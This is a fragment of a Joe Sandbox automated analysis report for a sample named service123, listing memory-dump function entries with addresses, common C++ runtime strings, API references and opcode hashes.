Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 731bf4b80ef645d713390b289ed2b83192a821cbd25c0a033dced43c37adb36d
Instruction ID: 25ab0b5912f16b127ce07682665b4bbc2d9a51f897a7ab515cdd59c03613a60d
Opcode Fuzzy Hash: 731bf4b80ef645d713390b289ed2b83192a821cbd25c0a033dced43c37adb36d
Instruction Fuzzy Hash: 3D42B07168830E8FD700CF29C48075AFBE2AF85B09F15492DECA58BB41D775D94ACB92

Function 6C2F5880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

Infinity, xrefs: 6C2F5BE0
, xrefs: 6C2F6D95
, xrefs: 6C2F7074
NaN, xrefs: 6C2F5B5F

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: a03bd1f3ab58efd30666715046da53ffab5b4242759471cf5064e50358424de8
Instruction ID: f1742dcc855398ff6176e793d90246e0c1fec9fb6deacdc74fcca4aa00a9577c
Opcode Fuzzy Hash: a03bd1f3ab58efd30666715046da53ffab5b4242759471cf5064e50358424de8
Instruction Fuzzy Hash: C1E212B1A4934A8FD710CF29C18074AFBE0FF89748F14892DE8A597751E775E8468F82

Function 002D51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 002D69A4
, xrefs: 002D66C5

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: bb9e588087c379a9db3900724cc2c0e1010d37512efe2c5a5c2ead983b66d07c
Instruction ID: c86f8c689fc15e2a7d8dea4d4f55857016bb01bb97b8db4459c470f328886a77
Opcode Fuzzy Hash: bb9e588087c379a9db3900724cc2c0e1010d37512efe2c5a5c2ead983b66d07c
Instruction Fuzzy Hash: E7E244B1A287528FD720DF29C08475AFBE1BF88744F14891EE88997351E7B5EC548F82

Function 6C2F44F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 6C2F4613
@, xrefs: 6C2F46A9
gfff, xrefs: 6C2F45FC
., xrefs: 6C2F47E4

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 99ff51a1617bf27d200cef4114520e579b67e669c2dfa7f55efd1e9fe1234955
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 3BD1C771A4834E8BD700DE29C58074BFBE2AFC5348F14C52DEC648BB55D7B4D94A8B82

Function 002D3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 002D3F2C
., xrefs: 002D4114
@, xrefs: 002D3FD9
gfff, xrefs: 002D3F43

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 05abdac296fba5a0d798903058932866ff98476a7a52cc9b791eb76be2bddeba
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 28D1C671A283068BD714EF28C48431BBBE2EFD4344F18C92EE8999B355D770DD598B92

Function 6C382EF0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C383000

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 30d32da02d4bdd1d4ece5ed75c48e6a93b5c6751bc2082368f4e02bfd40e7e67
Instruction ID: 416f8c4a54b2454567564463b77c7fb7b2a50fab468c98f13484f6309bbee1b0
Opcode Fuzzy Hash: 30d32da02d4bdd1d4ece5ed75c48e6a93b5c6751bc2082368f4e02bfd40e7e67
Instruction Fuzzy Hash: BB4149B2A0A7108FD714DF29D58064AFBF4AF99314F15C96EE8988B319D331D845CFA2

Function 6C3804E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C380550
memset.MSVCRT ref: 6C380574

Strings

basic_string::_M_replace_aux, xrefs: 6C3805F0

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 32b20dea85cdafc0f180e572ef7791df74063a048d22a49919f66ba74cbdaf02
Instruction ID: 434fe5bc60934227bce6d1d2cb104f1edb5eb124aeb5251f4b7423afb083fc3b
Opcode Fuzzy Hash: 32b20dea85cdafc0f180e572ef7791df74063a048d22a49919f66ba74cbdaf02
Instruction Fuzzy Hash: D1316E7560F6948FC7059F6CD4C062ABBF1AF86204F14896DE8A88BB95D732C844CF62

Function 6C3535F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C353648
memcpy.MSVCRT ref: 6C3536C1

Part of subcall function 6C355340: memcpy.MSVCRT ref: 6C3553D0

Strings

basic_string::_M_replace_aux, xrefs: 6C353670

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 3680a9e44aa7845c060e35d6a673c9115dc584a6b3585fca3eee3cfbd17297df
Instruction ID: 34f00ec1ef49c08dbdba40e016b292ae50ce5d5d3673b951684ff5e97f2d4e0b
Opcode Fuzzy Hash: 3680a9e44aa7845c060e35d6a673c9115dc584a6b3585fca3eee3cfbd17297df
Instruction Fuzzy Hash: CB215E76A0A3149FC300AF1CD88496EFBE4EB85668F94496EE89897351D331D864CB92

Function 6C30A790 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C30A7AD
wcslen.MSVCRT ref: 6C30A7FD

Strings

basic_string: construction from null is not valid, xrefs: 6C30A7D0, 6C30A820

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 3489de018981521bf75acfad35a83664b20d043f2251c20a797cec99aed7cc04
Instruction ID: c075e9ddd7511544c52d90897904e2fe73f9660659066ac2b2505b9f7e07ca24
Opcode Fuzzy Hash: 3489de018981521bf75acfad35a83664b20d043f2251c20a797cec99aed7cc04
Instruction Fuzzy Hash: E91160B1A152148BCB01AF6CD4808AABBF4BF55614F02096DE8C89B711E232D959CF92

Function 6C30A3A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C30A3BD
wcslen.MSVCRT ref: 6C30A40D

Strings

basic_string: construction from null is not valid, xrefs: 6C30A3E0, 6C30A430

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 3489de018981521bf75acfad35a83664b20d043f2251c20a797cec99aed7cc04
Instruction ID: 1bc6a761157c46cd5ab9c9c362a07a42ddd2f09d67e7d61892687040395d2704
Opcode Fuzzy Hash: 3489de018981521bf75acfad35a83664b20d043f2251c20a797cec99aed7cc04
Instruction Fuzzy Hash: BF1160B2A152148BCB01EF2CD4808AABBF4BF45614F42096DE8C89B711E232D959CF92

Function 6C3196A0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C31A0BE

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: a7ffd02238218f28f19934dd17883aaa6dc5a2c6f66baeab115f8b6930840169
Instruction ID: 5777c09cedd1596be0c19baa144955f650038a0d68dc9ad679f34ef53352b458
Opcode Fuzzy Hash: a7ffd02238218f28f19934dd17883aaa6dc5a2c6f66baeab115f8b6930840169
Instruction Fuzzy Hash: 01A28070A083548FDB14CF69C48478DBBF2BF46325F288668D869ABA92D731DC49CF51

Function 6C318570 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C318F8E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: e3d87ef3b763e337c46d008a30e872ce82d74ab6f22f87583d8b6721ec1a2246
Instruction ID: 06b315c019958314cd4061ccb423124a66b12d26f7f6cedb946bb9171c87edfe
Opcode Fuzzy Hash: e3d87ef3b763e337c46d008a30e872ce82d74ab6f22f87583d8b6721ec1a2246
Instruction Fuzzy Hash: 21A29070A083548FDB14CF69C48478DBBF2BF46328F298659D865ABA92C731DC45CF92

Function 6C353440 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C3534C0

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: dd616da0468f6a2c5a7d176733d3dc0090566577fd5f670970cd82f1034dd053
Instruction ID: 491dc48a46c8d3781a571473fc7caf3536475dd0e2465f3479f272c7021c5954
Opcode Fuzzy Hash: dd616da0468f6a2c5a7d176733d3dc0090566577fd5f670970cd82f1034dd053
Instruction Fuzzy Hash: AE01B1F15093449BC3426F5AC080A2BFFE4AF91258F94882DE8C887B11C336D4148F62

Function 6C30A720 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C30A73D

Strings

basic_string: construction from null is not valid, xrefs: 6C30A760

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 41ae8a439d7e9968d53ba2c2473ce52bcd8e77f71564e65e1780d3af9ceb8ae2
Instruction ID: a60378e9abf04ce52f25c3ac9b3aad12b7c0e9ad08e6d803239adb50c65b154d
Opcode Fuzzy Hash: 41ae8a439d7e9968d53ba2c2473ce52bcd8e77f71564e65e1780d3af9ceb8ae2
Instruction Fuzzy Hash: 31F03AB5A152188BCB00EF6CD48085AB7F4BB55614F0248ADE8C49B711E232E959CF92

Function 6C30A330 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C30A34D

Strings

basic_string: construction from null is not valid, xrefs: 6C30A370

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 41ae8a439d7e9968d53ba2c2473ce52bcd8e77f71564e65e1780d3af9ceb8ae2
Instruction ID: b719621c476c9d5d23f8864567ad5c05719ccc19e80d3280a950af3e34246284
Opcode Fuzzy Hash: 41ae8a439d7e9968d53ba2c2473ce52bcd8e77f71564e65e1780d3af9ceb8ae2
Instruction Fuzzy Hash: 02F05EB1A152148FCB00EF2CD48085AB7F4BF56314F0208ADE8C49B721E232ED59CF92

Function 6C3004F0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C300548
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C300550

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 86816b96827a11c391a124ec3696236ab89b456f481b01dee727b9e3a8d8f5ee
Instruction ID: 8c20a923a83207600e789f7539043c250882223364785129cc7a47c4ab58490d
Opcode Fuzzy Hash: 86816b96827a11c391a124ec3696236ab89b456f481b01dee727b9e3a8d8f5ee
Instruction Fuzzy Hash: 290146BAA0A3009FC744DF29D881A9BFBE1ABC9754F10992DE488D7704C234D8818F87

Function 6C30C2C0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C30C318
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C30C320

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 0139055a4b5a1cabf6757ae65ab5a9280534fa1b6cf128d8617e2b2a26dd3d13
Instruction ID: 18000d16b494d000b0bbe55527590b2c3064c2e903820c55fe8b6e83e014116a
Opcode Fuzzy Hash: 0139055a4b5a1cabf6757ae65ab5a9280534fa1b6cf128d8617e2b2a26dd3d13
Instruction Fuzzy Hash: 79015671A182008BCB04EF2DD48091ABBE5FBCA708F5089ADE4889B310D631D849CF97

Function 6C324490 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab50f3ad2a51a66e55bd6146464772f84db8113ec7409dfc9fb4efb83a24ea96
Instruction ID: 8a497328e4ce237ce460321bfe62a9f2dfa7e2b2aa9b2de37871092f15a45f9b
Opcode Fuzzy Hash: ab50f3ad2a51a66e55bd6146464772f84db8113ec7409dfc9fb4efb83a24ea96
Instruction Fuzzy Hash: F3828F71E042988FDF10CFA8C48078DBBF1AF46318F298659E8A5AB795C339D845CF91

Function 6C322A7E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d745f1cd3c0c55b4a984ea119e390d3f9688a7f0492d5ecb8057c7cd8cc80c1
Instruction ID: e8a55bb3b2ae36d86cf91d7de00f5c9ef5b94f5159ef24c70a0e5d780b7ecb9a
Opcode Fuzzy Hash: 2d745f1cd3c0c55b4a984ea119e390d3f9688a7f0492d5ecb8057c7cd8cc80c1
Instruction Fuzzy Hash: A6729F70A18398CFDF11CFA8C58479DBBF1AF09328F148659D4A5ABB91C33AA845CF51

Function 6C3211BE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
